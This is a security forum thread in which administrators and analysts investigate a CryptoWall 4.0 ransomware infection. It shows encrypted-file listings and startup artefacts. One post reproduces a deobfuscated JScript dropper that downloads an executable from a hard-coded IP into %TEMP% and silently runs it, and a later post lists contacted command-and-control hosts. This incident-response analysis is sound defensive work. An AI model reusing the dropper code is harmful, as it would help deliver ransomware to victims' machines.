Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

CryptoWall 4.0: Help_Your_Files Ransomware Support Topic


  • Please log in to reply
433 replies to this topic

#16 Passkeycs

Passkeycs

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:09:46 AM

Posted 03 November 2015 - 12:15 PM

Found out which user.  No signs of a virus.  No local files encrypted??  Only server drives.  "Resume" email.  Any idea what we are looking for to clean?  We have a good backup...  Whew.



BC AdBot (Login to Remove)

 


#17 Passkeycs

Passkeycs

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:09:46 AM

Posted 03 November 2015 - 12:18 PM

Closer look.  The files that look to have been glossed over are xls.xlsx?  Probably user error on a save.



#18 Passkeycs

Passkeycs

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:09:46 AM

Posted 03 November 2015 - 12:19 PM

Noticing  appdata\roaming\random folder\randomfile.exe



#19 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:46 AM

Posted 03 November 2015 - 12:21 PM

Pass, yes, saw that, too. I bet if you check your startup items in msconfig.exe, you will see that .EXE as a startup item, too. TDSSKiller caught it for us.



#20 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,612 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:46 AM

Posted 03 November 2015 - 12:23 PM

Yes, this uses a .JS file to download and execute a file from the %temp% folder.

#21 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,612 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:46 AM

Posted 03 November 2015 - 12:25 PM

C2 server identical to cryptowall. May be new variant.

#22 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:46 AM

Posted 03 November 2015 - 12:26 PM

Grinler, yeah, I am already referring to it as CryptoWall 4.0 in my internal documentation. I used the file decrypter service and everything. Architecture looks exactly the same.



#23 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:11:46 AM

Posted 03 November 2015 - 12:43 PM

PresComm -- does it change file extensions of affected files?  Before I look closer...


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#24 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:46 AM

Posted 03 November 2015 - 12:46 PM

WHM, yes it does. 

Example of a dir command run where some files are located

 

11/02/2015  13:12            14,076 0ausbffwh.p5

11/02/2015  13:12            13,740 0d06g.m4
11/02/2015  13:12            12,124 183d0z3a1i.3g
11/02/2015  13:12           148,812 2uxg648.22y1
11/02/2015  13:12            31,612 49517u9.ezys3
11/02/2015  13:12           520,268 4a1l2xzl2.12v
11/02/2015  13:12            22,892 4m0dqf714.18pj
11/02/2015  13:12            13,324 5ixmq7v.8h
11/02/2015  13:12            13,052 72lcvn.iv6nn
11/02/2015  13:12            13,388 787izcrv.9paf3
11/02/2015  13:12            12,620 k4f2h18h.e6
11/02/2015  13:12        23,664,912 ki2cy7qckg.w0m
11/02/2015  13:12             9,724 l3it1yb8.u44s0
11/02/2015  13:12            14,540 mebb96c2xc.d8s9v
11/02/2015  13:12            12,364 oze14izm3z.r8wj2
11/02/2015  13:12            33,148 u1s9iuwutx.pf3wo
11/02/2015  13:12            39,788 x83o8x.ux7
11/02/2015  13:12            14,316 xae9y5.7g0c
11/02/2015  13:12            20,412 zc7pu7p2h.220rc
11/02/2015  13:12            13,932 zr9nwvf7.id9v

Edited by PresComm, 03 November 2015 - 12:46 PM.


#25 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:11:46 AM

Posted 03 November 2015 - 01:11 PM

Interesting.  Outside of the ZIP file, do you have the executable file that it downloads that carries out the actual encryption routine?  It should be within %TEMP%.

 

Executing the JS file in two different environments results in several errors...  it seems like the author's JS is sloppy/miscoded, and/or the payload file it uses XMLHttpRequest to send a GET to retrieve no longer exists (or has likely moved).

 

Quick Overview

 

  • Nearly FUD at this time; 1 AV engine in VirusTotal flags this JS file as malicious (Symantec).

  • Performs a GET request to retrieve the payload file from 46.30.45.110 on Port 80

  • JavaScript looks like it was run through a beautifier / obfuscator, obfuscation isn't very complex

  • IP address it requests to download payload file belongs to the Russian Federation

And here is a more cleaned up version of the JS code:

 

(function(dataAndEvents) {
  /**
   * @param {string} xdomain
   * @return {?}
   */
  function request(xdomain) {
    return new dataAndEvents.ActiveXObject(xdomain);
  }
  /** @type {boolean} */
  var QAKDHaz = true;
  /** @type {string} */
  var curPort = "DB.Stream";
  var doRequest;
  /**
   * @param {string} url
   * @param {(Node|string)} scope
   * @param {number} deepDataAndEvents
   * @return {undefined}
   */
  doRequest = function(url, scope, deepDataAndEvents) {
    var req = request("WScript" + (1229173, ".Shell"));
    var xhr = request("MSXML2.XMLHTTP");
    /** @type {string} */
    var nonStripName = "%TEMP%\\";
    scope = req.ExpandEnvironmentStrings(nonStripName) + scope;
    /**
     * @return {?}
     */
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4) {
        /** @type {boolean} */
        QAKDHaz = false;
        with(request("ADO" + curPort)) {
          open();
          /** @type {number} */
          type = 1;
          write(xhr.ResponseBody);
          saveToFile(scope, 2);
          close();
          return scope;
        }
      }
    };
    xhr.open("G" + (3882399, 462019, "ET"), url, false);
    xhr.send();
    for (;QAKDHaz;) {
      dataAndEvents.WScript.Sleep(1E3);
    }
    if (new Date > 0, 7125) {
      req.Run(scope, 0, 0);
    }
  };
  doRequest("http://46.30.45." + "110/anali" + "tics.e" + "x" + "e", "160967872.exe", 1);
})(this);

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#26 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:46 AM

Posted 03 November 2015 - 01:18 PM

I do not. Unfortunately, as stated previously, the technicians that responded didn't really pay mind to forensics before they blasted the machine with anti-x tools.

 

If all else fails, I will infect my sandbox with it and get a copy of it that way. If I do, want me to upload it to Mega again and get you the link?



#27 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:11:46 AM

Posted 03 November 2015 - 01:21 PM

I do not. Unfortunately, as stated previously, the technicians that responded didn't really pay mind to forensics before they blasted the machine with anti-x tools.

 

If all else fails, I will infect my sandbox with it and get a copy of it that way. If I do, want me to upload it to Mega again and get you the link?

 

Yes please -- I executed it on Win 2003 and Win 2008, ran it through a sandbox, and each time the 2nd stage payload couldn't be retrieved...  Not sure if the hard-coded URL is still active.


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#28 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:46 AM

Posted 03 November 2015 - 01:21 PM

Nevermind. Found "analitics.exe" on Malwr. Uploading it to Mega and shooting PM.



#29 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:11:46 AM

Posted 03 November 2015 - 01:26 PM

Nevermind. Found "analitics.exe" on Malwr. Uploading it to Mega and shooting PM.

 

Yep that's the dropper.  I didn't look for it on MALWR yet, I'll check it out when you PM me.


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#30 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:11:46 AM

Posted 03 November 2015 - 01:44 PM

analitics.exe

 

Contacted Domains / IPs

  • 66.7.210.114 (adcconsulting.net, abelindia.com)
  • 173.237.136.250 (myshop.lk)
  • 103.27.61.200 (httthanglong.com)
  • 103.224.22.13 (ks0407.com)
  • 184.168.47.225 (successafter60.com, purposenowacademy.com)
  • 104.28.9.242 (localburialinsuranceinfo.com)
  • 143.95.52.38 (kingalter.com)

Edited by White Hat Mike, 03 November 2015 - 01:46 PM.

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users